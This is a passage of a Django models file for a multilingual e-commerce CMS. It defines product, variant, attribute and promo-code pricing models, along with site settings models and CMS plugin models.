models.CharField(\n _(\"Product's Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n product_name_trans = TranslatedField()\n slug = AutoSlugField(\n populate_from=\"product_name\",\n unique=True\n )\n categories = models.ManyToManyField(\n ProductCategory,\n verbose_name=_(\"Categories\"),\n blank=True\n )\n filters = models.ManyToManyField(\n ProductFilter,\n verbose_name=_(\"Filters\"),\n blank=True\n )\n brand = models.ForeignKey(\n ProductBrand,\n on_delete=models.SET_NULL,\n verbose_name=_(\"Brand\"),\n blank=True,\n null=True\n )\n label = models.ForeignKey(\n ProductLabel,\n on_delete=models.SET_NULL,\n verbose_name=_(\"Custom Label\"),\n blank=True,\n null=True,\n help_text=_(\"Add a custom label to the product.\")\n )\n is_vedette = models.BooleanField(\n verbose_name=_(\"Featured\"),\n default=False\n )\n caption = TranslatedField()\n description = TranslatedField()\n order = models.PositiveIntegerField(\n verbose_name=_(\"Sort by\"),\n db_index=True\n )\n cms_pages = models.ManyToManyField(\n \"cms.Page\",\n through=ProductPage\n )\n main_image = image.FilerImageField(\n verbose_name=_(\"Main Image\"),\n on_delete=models.SET_NULL,\n related_name=\"main_image\",\n null=True,\n blank=True\n )\n images = models.ManyToManyField(\n \"filer.Image\",\n through=ProductImage\n )\n\n class Meta:\n verbose_name = _(\"Product\")\n verbose_name_plural = _(\"Products\")\n ordering = [\"order\"]\n\n objects = ProductManager()\n\n lookup_fields = [\"product_name__icontains\", \"description__icontains\"]\n\n def __str__(self):\n return self.product_name\n\n def get_absolute_url(self):\n page = Page.objects.filter(reverse_id=\"produits\").first()\n if page is not None:\n return urljoin(page.get_absolute_url(), self.slug)\n return \"\"\n\n @property\n def sample_image(self):\n if self.main_image:\n return self.main_image\n else:\n return self.images.first()\n\n\nclass ProductTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of Product\n \"\"\"\n\n master = models.ForeignKey(\n Product,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n product_name_trans = models.CharField(\n _(\"Product's Name\"),\n max_length=255,\n null=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n caption = HTMLField(\n verbose_name=_(\"Caption\"),\n configuration=\"CKEDITOR_SETTINGS_CAPTION\",\n blank=True,\n null=True,\n help_text=_(\"Short description.\")\n )\n description = HTMLField(\n verbose_name=_(\"Description\"),\n configuration=\"CKEDITOR_SETTINGS_DESCRIPTION\",\n blank=True,\n null=True,\n help_text=_(\"Long description.\"),\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\n# ===---\n\n\nclass ProductDefault(AvailableProductMixin, Product):\n \"\"\"\n A basic Product, polymorphic child of Product\n \"\"\"\n\n product_code = models.CharField(\n _(\"Product's Code\"),\n max_length=255,\n unique=True,\n help_text=_(\"A unique code.\\\n Maximum 255 characters.\\\n Prioritize creating a new product instead of\\\n updating this code.\")\n )\n unit_price = MoneyField(\n _(\"Unit Price\"),\n decimal_places=3,\n help_text=_(\"Net price for this product.\")\n )\n quantity = models.PositiveIntegerField(\n _(\"Quantity\"),\n default=0,\n validators=[MinValueValidator(0)],\n help_text=_(\"Available quantity in stock.\")\n )\n multilingual = TranslatedFields(\n description=HTMLField(\n verbose_name=_(\"Description\"),\n configuration=\"CKEDITOR_SETTINGS_DESCRIPTION\",\n help_text=_(\"Long description.\")\n )\n )\n discounted_price = MoneyField(\n _(\"Discounted Unit Price\"),\n decimal_places=3,\n null=True,\n blank=True,\n default=0,\n help_text=_(\"Net discounted price for this product.\")\n )\n start_date = models.DateTimeField(\n _(\"Discount Start DateTime\"),\n null=True,\n blank=True,\n help_text=_(\"Start DateTime Discount\"),\n )\n end_date = models.DateTimeField(\n _(\"Discount Stop DateTime\"),\n null=True,\n blank=True,\n help_text=_(\"Stop DateTime Discount\"),\n )\n\n class Meta:\n verbose_name = _(\"Default Product\")\n verbose_name_plural = _(\"Default Products\")\n\n @property\n def get_caption(self):\n if self.caption:\n c = TAG_RE.sub(\"\", self.caption)\n return c\n return \"\"\n\n @property\n def get_description(self):\n if self.description:\n desc = TAG_RE.sub(\"\", self.description)\n return desc\n return \"\"\n\n @property\n def is_discounted(self):\n if self.discounted_price == Money(0) or \\\n self.discounted_price is None or \\\n self.start_date is None or \\\n self.end_date is None:\n return False\n today = pytz.utc.localize(datetime.utcnow())\n if self.start_date < today and self.end_date > today:\n return True\n return False\n\n def get_price(self, request=None): # noqa C910\n r = self.unit_price\n\n if self.is_discounted:\n r = self.discounted_price\n\n # ===--- GET DISCOUNTS\n if dmRabaisPerCategory is not None:\n r = get_apply_discountpercategory(self, r, self.is_discounted)\n\n if request:\n # ===--- GET PROMOCODE\n if dmPromoCode is not None:\n try:\n customer = CustomerModel.objects.get_from_request(request)\n today = pytz.utc.localize(datetime.utcnow())\n all_cat = self.categories.all()\n all_codes = dmCustomerPromoCode.objects.filter(\n (\n Q(promocode__categories=None)\n | Q(promocode__categories__in=all_cat)\n ) & (\n Q(promocode__products=None)\n | Q(promocode__products__in=[self])\n ) & Q(promocode__is_active=True) & (\n Q(promocode__valid_from__isnull=True)\n | Q(promocode__valid_from__lte=today)\n ) & (\n Q(promocode__valid_until__isnull=True)\n | Q(promocode__valid_until__gt=today)\n ) & Q(promocode__apply_on_cart=False),\n customer=customer,\n is_expired=False\n ).distinct()\n if all_codes.count() > 0:\n for d in all_codes:\n is_true = d.promocode.can_apply_on_discounted\n if not self.is_discounted or (\n self.is_discounted and is_true\n ):\n if d.promocode.amount is not None:\n r = Money(\n Decimal(r) - Decimal(\n d.promocode.amount\n )\n )\n elif d.promocode.percent is not None:\n pourcent = Decimal(\n d.promocode.percent) / Decimal(\"100\")\n discount = Money(\n Decimal(self.unit_price) * pourcent)\n r = r - discount\n except Exception:\n print(\"Error on ProductDefault's get_price\")\n if Decimal(r) <= 0:\n r = Money(0)\n return r\n\n def get_promocodes(self, request):\n if dmPromoCode:\n customer = CustomerModel.objects.get_from_request(request)\n today = pytz.utc.localize(datetime.utcnow())\n if self.is_discounted:\n all_codes = dmCustomerPromoCode.objects.filter(\n (\n Q(promocode__categories=None)\n | Q(promocode__categories__in=self.categories.all())\n ) & (\n Q(promocode__products=None)\n | Q(promocode__products__in=[self])\n ) & Q(promocode__is_active=True)\n & (\n Q(promocode__valid_from__isnull=True)\n | Q(promocode__valid_from__lte=today)\n ) & (\n Q(promocode__valid_until__isnull=True)\n | Q(promocode__valid_until__gt=today)\n ) & Q(promocode__can_apply_on_discounted=True),\n customer=customer,\n is_expired=False\n ).distinct()\n else:\n all_codes = dmCustomerPromoCode.objects.filter(\n (\n Q(promocode__categories=None)\n | Q(promocode__categories__in=self.categories.all())\n ) & (\n Q(promocode__products=None)\n | Q(promocode__products__in=[self])\n )\n & Q(promocode__is_active=True) & (\n Q(promocode__valid_from__isnull=True)\n | Q(promocode__valid_from__lte=today)\n ) & (Q(promocode__valid_until__isnull=True)\n | Q(promocode__valid_until__gt=today)),\n customer=customer,\n is_expired=False\n ).distinct()\n return all_codes\n\n def get_realprice(self):\n return self.unit_price\n\n\n# ===---\n\n\nclass ProductVariable(Product):\n \"\"\"\n A basic variable Product, polymorphic child of Product,\n parent of ProductVariableVariant.\n \"\"\"\n square_id = models.CharField(\n verbose_name=_(\"Square ID\"),\n max_length=30,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 30 characters.\")\n )\n multilingual = TranslatedFields(\n description=HTMLField(\n verbose_name=_(\"Description\"),\n configuration=\"CKEDITOR_SETTINGS_DESCRIPTION\",\n help_text=_(\"Long description.\")\n )\n )\n\n class Meta:\n verbose_name = _(\"Variable Product\")\n verbose_name_plural = _(\"Variable Products\")\n\n default_manager = ProductManager()\n\n @property\n def get_caption(self):\n if self.caption:\n c = TAG_RE.sub(\"\", self.caption)\n return c\n return \"\"\n\n @property\n def get_description(self):\n if self.description:\n desc = TAG_RE.sub(\"\", self.description)\n return desc\n return \"\"\n\n def get_price(self, request=None):\n if not hasattr(self, \"_price\"):\n if self.variants.exists():\n currency = self.variants.first().unit_price.currency\n aggr = self.variants.aggregate(models.Min(\"unit_price\"))\n self._price = MoneyMaker(currency)(aggr[\"unit_price__min\"])\n else:\n self._price = Money()\n return self._price\n\n def get_availability(self, request, **kwargs):\n variant = self.get_product_variant(**kwargs)\n return variant.get_availability(request)\n\n def deduct_from_stock(self, quantity, **kwargs):\n variant = self.get_product_variant(**kwargs)\n variant.deduct_from_stock(quantity)\n\n def is_in_cart(self, cart, watched=False, **kwargs):\n try:\n product_code = kwargs[\"product_code\"]\n except KeyError:\n return\n cart_item_qs = CartItem.objects.filter(cart=cart, product=self)\n for cart_item in cart_item_qs:\n if cart_item.product_code == product_code:\n return cart_item\n\n def get_product_variant(self, **kwargs):\n try:\n product_code = kwargs.get(\"product_code\")\n return self.variants.get(product_code=product_code)\n except ProductVariableVariant.DoesNotExist as e:\n raise ProductVariable.DoesNotExist(e)\n\n def get_product_variants(self):\n return self.variants.all()\n\n def get_product_attribute(self):\n if self.variants.all():\n data = {}\n for a in self.variants.all()[0].attribute.all():\n if a.attribute.name not in data:\n data[a.attribute.name] = []\n for d in data:\n data[d] = list(\n AttributeValue.objects.filter(\n attribute__name=d\n ).values_list('value', flat=True)\n )\n return data\n\n def get_attribute_values(self):\n if self.variants.all():\n data = {}\n data[\"key\"] = []\n data[\"value\"] = []\n for v in self.variants.all():\n for a in v.attribute.all():\n if a.attribute.name not in data[\"key\"]:\n data[\"key\"].append(a.attribute.name)\n if a.value not in data[\"value\"]:\n data[\"value\"].append(a.value)\n return data\n\n\nclass Attribute(TranslatableModel):\n name = models.CharField(\n verbose_name=_(\"Attribute Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n name_trans = TranslatedField()\n square_id = models.CharField(\n verbose_name=_(\"Square ID\"),\n max_length=30,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 30 characters.\")\n )\n\n class Meta:\n verbose_name = _(\"Product's Attribute\")\n verbose_name_plural = _(\"Product's Attributes\")\n\n def __str__(self):\n return self.name\n\n\nclass AttributeValue(TranslatableModel):\n attribute = models.ForeignKey(\n Attribute,\n on_delete=models.CASCADE,\n verbose_name=_(\"Attribute\"),\n related_name=\"attribute\"\n )\n square_id = models.CharField(\n verbose_name=_(\"Square ID\"),\n max_length=30,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 30 characters.\")\n )\n value = models.CharField(\n verbose_name=_(\"Attribute Value\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n value_trans = TranslatedField()\n\n def __str__(self):\n return self.attribute.name + ' - ' + self.value\n\n\nclass AttributeTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of Attribute\n \"\"\"\n\n master = models.ForeignKey(\n Attribute,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n name_trans = models.CharField(\n verbose_name=_(\"Translated Attribute Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass AttributeValueTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of Attribute Value\n \"\"\"\n\n master = models.ForeignKey(\n AttributeValue,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n value_trans = models.CharField(\n verbose_name=_(\"Translated Attribute Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass ProductVariableVariant(AvailableProductMixin, models.Model):\n \"\"\"\n A basic variant of ProductVariable, will be used to populate\n cart item data.\n \"\"\"\n\n product = models.ForeignKey(\n ProductVariable,\n on_delete=models.CASCADE,\n verbose_name=_(\"Product\"),\n related_name=\"variants\"\n )\n product_code = models.CharField(\n _(\"Product's Code\"),\n max_length=255,\n unique=True,\n help_text=_(\"A unique code.\\\n Maximum 255 characters.\\\n Prioritize creating a new product instead of\\\n updating this code.\")\n )\n attribute = models.ManyToManyField(\n AttributeValue,\n verbose_name=_(\"Attribute\"),\n blank=True\n )\n unit_price = MoneyField(\n _(\"Unit Price\"),\n decimal_places=3,\n help_text=_(\"Net price for this product.\")\n )\n quantity = models.PositiveIntegerField(\n _(\"Quantity\"),\n default=0,\n validators=[MinValueValidator(0)],\n help_text=_(\"Available quantity in stock.\")\n )\n discounted_price = MoneyField(\n _(\"Discounted Unit Price\"),\n decimal_places=3,\n null=True,\n blank=True,\n default=0,\n help_text=_(\"Net discounted price for this product.\")\n )\n start_date = models.DateTimeField(\n _(\"Discount Start DateTime\"),\n null=True,\n blank=True,\n help_text=_(\"Start DateTime Discount\"),\n )\n end_date = models.DateTimeField(\n _(\"Discount Stop DateTime\"),\n null=True,\n blank=True,\n help_text=_(\"Stop DateTime Discount\"),\n )\n variant_image = image.FilerImageField(\n verbose_name=_(\"Variant Image\"),\n on_delete=models.SET_NULL,\n related_name=\"variant_image\",\n null=True,\n blank=True,\n help_text=_(\"Recommended size: 810x900.\")\n )\n\n class Meta:\n verbose_name = _(\"Product Variant\")\n verbose_name_plural = _(\"Product Variants\")\n\n def __str__(self):\n return _(\"{product}\").format(product=self.product)\n\n @property\n def is_discounted(self):\n if self.discounted_price == Money(0) or self.discounted_price is None:\n return False\n today = pytz.utc.localize(datetime.utcnow())\n if not self.start_date:\n return False\n if self.start_date < today and not self.end_date:\n return True\n elif self.start_date < today and self.end_date > today:\n return True\n\n def get_price(self, request=None): # noqa: C901\n r = self.unit_price\n\n if self.is_discounted:\n r = self.discounted_price\n\n # ===--- GET DISCOUNTS\n if dmRabaisPerCategory is not None:\n r = get_apply_discountpercategory(\n self.product,\n r,\n self.is_discounted\n )\n\n if request:\n # ===--- GET PROMOCODE\n if dmPromoCode is not None:\n try:\n customer = CustomerModel.objects.get_from_request(request)\n today = pytz.utc.localize(datetime.utcnow())\n all_cat = self.product.categories.all()\n all_codes = dmCustomerPromoCode.objects.filter(\n (\n Q(promocode__categories=None)\n | Q(promocode__categories__in=all_cat)\n ) & (\n Q(promocode__products=None)\n | Q(promocode__products__in=[self.product])\n ) & Q(promocode__is_active=True) & (\n Q(promocode__valid_from__isnull=True)\n | Q(promocode__valid_from__lte=today)\n ) & (\n Q(promocode__valid_until__isnull=True)\n | Q(promocode__valid_until__gt=today)\n ) & Q(promocode__apply_on_cart=False),\n customer=customer,\n is_expired=False\n ).distinct()\n if all_codes.count() > 0:\n for d in all_codes:\n if not self.is_discounted or (\n self.is_discounted and\n d.promocode.can_apply_on_discounted\n ):\n if d.promocode.amount is not None:\n r = Money(\n Decimal(r) - Decimal(\n d.promocode.amount\n )\n )\n elif d.promocode.percent is not None:\n pourcent = Decimal(\n d.promocode.percent\n ) / Decimal(\"100\")\n discount = Money(\n Decimal(self.unit_price) * pourcent\n )\n r = r - discount\n except Exception:\n print(\"Error on ProductVariableVariant's get_price\")\n if Decimal(r) <= 0:\n r = Money(0)\n return r\n\n def get_promocodes(self, request):\n if dmPromoCode is not None:\n customer = CustomerModel.objects.get_from_request(request)\n today = pytz.utc.localize(datetime.utcnow())\n all_codes = dmCustomerPromoCode.objects.filter(\n (\n Q(promocode__categories=None)\n | Q(\n promocode__categories__in=self.product.categories.all()\n )\n ) & (\n Q(promocode__products=None)\n | Q(promocode__products__in=[self.product])\n ) & Q(promocode__is_active=True) & (\n Q(promocode__valid_from__isnull=True)\n | Q(promocode__valid_from__lte=today)\n ) & (\n Q(promocode__valid_until__isnull=True)\n | Q(promocode__valid_until__gt=today)\n ),\n customer=customer,\n is_expired=False\n ).distinct()\n return all_codes\n\n def get_realprice(self):\n return self.unit_price\n\n\nclass ProductDocument(models.Model):\n\n product = models.ForeignKey(\n Product,\n on_delete=models.CASCADE,\n verbose_name=_(\"Product\"),\n related_name=\"product_document\"\n )\n name = models.CharField(\n verbose_name=_(\"Document's Name\"),\n max_length=255,\n help_text=_(\"Maximum 255 characters.\")\n )\n document = FilerFileField(\n verbose_name=_(\"Document\"),\n on_delete=models.CASCADE,\n null=False,\n blank=False\n )\n\n class Meta:\n verbose_name = _(\"Product Document\")\n verbose_name_plural = _(\"Product Documents\")\n\n def __str__(self):\n return self.name\n\n\n#######################################################################\n# Plugins\n#######################################################################\n\n\nclass dmSite(models.Model):\n \"\"\"\n A model to replace sites.Site and help handles site's data.\n \"\"\"\n\n site = models.ForeignKey(\n sites.models.Site,\n on_delete=models.CASCADE,\n related_name=\"dmsite\"\n )\n google_analytics = models.TextField(\n verbose_name=_(\"Google Analytics Snippet\"),\n blank=True,\n null=True\n )\n\n class Meta:\n verbose_name = _(\"Site\")\n verbose_name_plural = _(\"Site\")\n\n def __str__(self):\n return self.site.name\n\n\nclass dmSiteLogo(models.Model):\n \"\"\"\n Logo's data (light and dark version) of the site.\n Can be used to easily retrieve and update logo\n all around the site.\n \"\"\"\n\n site = models.ForeignKey(\n dmSite,\n on_delete=models.CASCADE,\n related_name=\"logos\"\n )\n logolight = image.FilerImageField(\n verbose_name=_(\"Logo pour fond clair\"),\n on_delete=models.SET_NULL,\n related_name=\"logo_light\",\n blank=False,\n null=True\n )\n logodark = image.FilerImageField(\n verbose_name=_(\"Logo pour fond sombre\"),\n on_delete=models.SET_NULL,\n related_name=\"logo_dark\",\n blank=False,\n null=True\n )\n favico_180 = image.FilerImageField(\n verbose_name=_(\"Favicon 180x180\"),\n on_delete=models.SET_NULL,\n related_name=\"favico_180\",\n blank=True,\n null=True,\n help_text=_(\"Size: 180x180. Format: .png\")\n )\n favico_192 = image.FilerImageField(\n verbose_name=_(\"Favicon 192x192\"),\n on_delete=models.SET_NULL,\n related_name=\"favico_192\",\n blank=True,\n null=True,\n help_text=_(\"Size: 192x192. Format: .png\")\n )\n favico_512 = image.FilerImageField(\n verbose_name=_(\"Favicon 512x512\"),\n on_delete=models.SET_NULL,\n related_name=\"favico_512\",\n blank=True,\n null=True,\n help_text=_(\"Size: 512x512. Format: .png\")\n )\n favico_ico = FilerFileField(\n verbose_name=_(\"Favicon 48x48\"),\n on_delete=models.SET_NULL,\n related_name=\"favico_ico\",\n blank=True,\n null=True,\n help_text=_(\"Size: 48x48. Format: .ico\")\n )\n\n class Meta:\n verbose_name = _(\"Logo\")\n verbose_name_plural = _(\"Logos\")\n\n def __str__(self):\n return \"Logo\"\n\n\nclass dmSiteContact(TranslatableModel):\n \"\"\"\n Contact's data (phone, email, address, etc.) about the site.\n Can be used to easily retrieve and update contact's data\n all around the site.\n \"\"\"\n\n site = models.ForeignKey(\n dmSite,\n on_delete=models.CASCADE,\n related_name=\"contacts\"\n )\n phone = models.CharField(\n verbose_name=_(\"Phone\"),\n max_length=20,\n blank=True,\n null=True\n )\n phone_secondary = models.CharField(\n verbose_name=_(\"Secondary Phone\"),\n max_length=20,\n blank=True,\n null=True,\n help_text=_(\"Facultative.\")\n )\n email = models.CharField(\n verbose_name=_(\"Email\"),\n max_length=1000,\n blank=True,\n null=True\n )\n address = models.CharField(\n verbose_name=_(\"Address\"),\n max_length=1000,\n blank=True,\n null=True\n )\n schedule = TranslatedField()\n map_latitude = models.CharField(\n verbose_name=_(\"Map Latitude\"),\n max_length=120,\n blank=True,\n null=True\n )\n map_longitude = models.CharField(\n verbose_name=_(\"Map Longitude\"),\n max_length=120,\n blank=True,\n null=True\n )\n\n class Meta:\n verbose_name = _(\"Contacts\")\n verbose_name_plural = _(\"Contacts\")\n\n def __str__(self):\n return \"Contacts\"\n\n\nclass dmSiteContactTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of dmSiteContact\n \"\"\"\n\n master = models.ForeignKey(\n dmSiteContact,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n schedule = models.TextField(\n verbose_name=_(\"Schedule\"),\n blank=True,\n null=True\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass dmSiteSocial(models.Model):\n \"\"\"\n Social media's links (facebook, intagram, youtube, etc.) of the site.\n Can be used to easily retrieve and update social medias\n all around the site.\n \"\"\"\n\n CHOIX_SOCIALS = [\n (1, _(\"Facebook\")),\n (2, _(\"Instagram\")),\n (3, _(\"Youtube\")),\n (4, _(\"Twitter\"))\n ]\n\n site = models.ForeignKey(\n dmSite,\n on_delete=models.CASCADE,\n related_name=\"social\"\n )\n social = models.PositiveSmallIntegerField(\n verbose_name=_(\"Social Network\"),\n choices=CHOIX_SOCIALS,\n default=1\n )\n url = models.CharField(\n verbose_name=_(\"Link\"),\n max_length=1000\n )\n\n class Meta:\n verbose_name = _(\"Social Network\")\n verbose_name_plural = _(\"Social Networks\")\n\n def __str__(self):\n return self.url\n\n\nclass dmSiteTermsAndConditions(TranslatableModel):\n \"\"\"\n Terms and Conditions text of the site.\n Can be used to easily retrieve and show Terms and Conditions\n all around the site.\n \"\"\"\n\n site = models.ForeignKey(\n dmSite,\n on_delete=models.CASCADE,\n related_name=\"termsandconditions\"\n )\n text = TranslatedField()\n\n class Meta:\n verbose_name = _(\"Terms and Conditions\")\n verbose_name_plural = _(\"Terms and Conditions\")\n\n def __str__(self):\n return \"Terms and Conditions\"\n\n\nclass dmSiteTermsAndConditionsTranslation(TranslatedFieldsModel):\n \"\"\"\n A model to handle translations of dmSiteTermsAndConditions\n \"\"\"\n\n master = models.ForeignKey(\n dmSiteTermsAndConditions,\n on_delete=models.CASCADE,\n related_name=\"translations\",\n null=True\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DESCRIPTION\",\n blank=True,\n null=True\n )\n\n class Meta:\n unique_together = [(\"language_code\", \"master\")]\n\n\nclass FeatureList(models.Model):\n\n feature_name = models.CharField(\n verbose_name=_(\"Feature Name\"),\n max_length=100\n )\n is_enabled = models.BooleanField(\n verbose_name=_(\"Is enabled?\"),\n default=False\n )\n\n class Meta:\n verbose_name = _(\"Feature List\")\n verbose_name_plural = _(\"Feature Lists\")\n\n def __str__(self):\n return self.feature_name\n\n\n#######################################################################\n# Plugins\n#######################################################################\n\n\nclass dmProductsCategories(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n label = models.CharField(\n verbose_name=_(\"Button's Label\"),\n max_length=255,\n default=\"See all\",\n null=True,\n blank=True,\n help_text=_(\"Facultative.\\\n Maximum 255 characters.\\\n Leave blank to hide button.\")\n )\n\n\nclass dmProductsVedette(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True,\n help_text=_(\"Facultative.\")\n )\n\n\nclass dmProductsByCategory(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True,\n help_text=_(\"Facultative.\")\n )\n text_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n null=True,\n blank=True\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n bg_image = image.FilerImageField(\n verbose_name=_(\"Background's Image\"),\n on_delete=models.SET_NULL,\n related_name=\"bg_image\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 2000x900.\")\n )\n\n\nclass dmProductsBrands(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n howmany = models.PositiveSmallIntegerField(\n verbose_name=_(\"Number\"),\n default=5,\n blank=False,\n null=False,\n help_text=_(\n \"How many brand's logo to be show at the same time.\"\n )\n )\n\n\n# ===---\n\n\nclass dmBlocEntete(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n\n\nclass dmBlocTextMedia(CMSPlugin):\n CHOIX_POSITION = [\n (0, _(\"Left\")),\n (1, _(\"Right\"))\n ]\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMBLOCKPLUGIN\",\n null=True,\n blank=True\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_textmedia_image\",\n null=True,\n blank=True,\n help_text=_(\"Sizes : 398x531. Leave blank to hide image.\")\n )\n video = FilerFileField(\n verbose_name=_(\"Video\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_textmedia_video\",\n null=True,\n blank=True,\n help_text=_(\"Leave blank to hide or use image instead.\")\n )\n text_align = models.BooleanField(\n verbose_name=_(\"Align text and media vertically?\"),\n default=True\n )\n colposition = models.PositiveSmallIntegerField(\n verbose_name=_(\"Image's Position\"),\n choices=CHOIX_POSITION,\n default=1,\n null=False,\n blank=False\n )\n\n\nclass dmBlocTextCarrousel(CMSPlugin):\n CHOIX_POSITION = [\n (0, _(\"Left\")),\n (1, _(\"Right\"))\n ]\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMBLOCKPLUGIN\",\n null=True,\n blank=True\n )\n text_align = models.BooleanField(\n verbose_name=_(\"Align text and media vertically?\"),\n default=True\n )\n colposition = models.PositiveSmallIntegerField(\n verbose_name=_(\"Image's Position\"),\n choices=CHOIX_POSITION,\n default=1,\n null=False,\n blank=False\n )\n howmany_image = models.PositiveSmallIntegerField(\n verbose_name=_(\"How Many Images?\"),\n default=1,\n help_text=_(\"How many images to show at the same time on desktop.\")\n )\n crop_image = models.BooleanField(\n verbose_name=_(\"Crop Image?\"),\n default=False,\n help_text=_(\"If checked, will crop images to fit the same ratio.\")\n )\n see_dots = models.BooleanField(\n verbose_name=_(\"Show Dots?\"),\n default=False,\n help_text=_(\n \"If checked, will display dots under carrousel for each image.\"\n )\n )\n see_navs = models.BooleanField(\n verbose_name=_(\"Show Navigation Arrows?\"),\n default=True,\n help_text=_(\n \"If checked, will display navigation \\\n arrows both sides of the carrousel.\"\n )\n )\n\n\nclass dmBlocTextCarrouselImage(CMSPlugin):\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.CASCADE,\n related_name=\"dmplugin_textcarrousel_image\",\n null=False,\n blank=False,\n help_text=_(\n \"Max sizes : 600x600. Always \\\n use the same ratio on the same carrousel.\"\n )\n )\n\n\nclass dmBlocText2Column(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text_left = HTMLField(\n verbose_name=_(\"Left Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMBLOCKPLUGIN\",\n null=True,\n blank=True\n )\n text_right = HTMLField(\n verbose_name=_(\"Right Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMBLOCKPLUGIN\",\n null=True,\n blank=True\n )\n text_align = models.BooleanField(\n verbose_name=_(\"Align texts vertically?\"),\n default=False\n )\n\n\nclass dmBlocEnteteVideo(CMSPlugin):\n videofile = FilerFileField(\n verbose_name=_(\"Video File\"),\n on_delete=models.CASCADE,\n null=False,\n blank=False,\n help_text=_(\"Prioritize .mp4 format.\")\n )\n\n\nclass dmBlocSliderParent(CMSPlugin):\n height = models.PositiveSmallIntegerField(\n verbose_name=_(\"Height\"),\n default=500,\n help_text=_(\n \"Height of the slider \\\n (will be automatically shrinked on mobile version).\"\n )\n )\n\n\nclass dmBlocSliderChild(CMSPlugin):\n CHOICE_POS_TEXT = [\n (1, _(\"Left\")),\n (2, _(\"Middle\")),\n (3, _(\"Right\"))\n ]\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n suptitle = models.CharField(\n verbose_name=_(\"Suptitle\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n title_color = ColorField(\n verbose_name=_(\"Title's Colour\"),\n null=True,\n blank=True\n )\n suptitle_color = ColorField(\n verbose_name=_(\"Suptitle's Colour\"),\n null=True,\n blank=True\n )\n subtitle_color = ColorField(\n verbose_name=_(\"Subtitle's 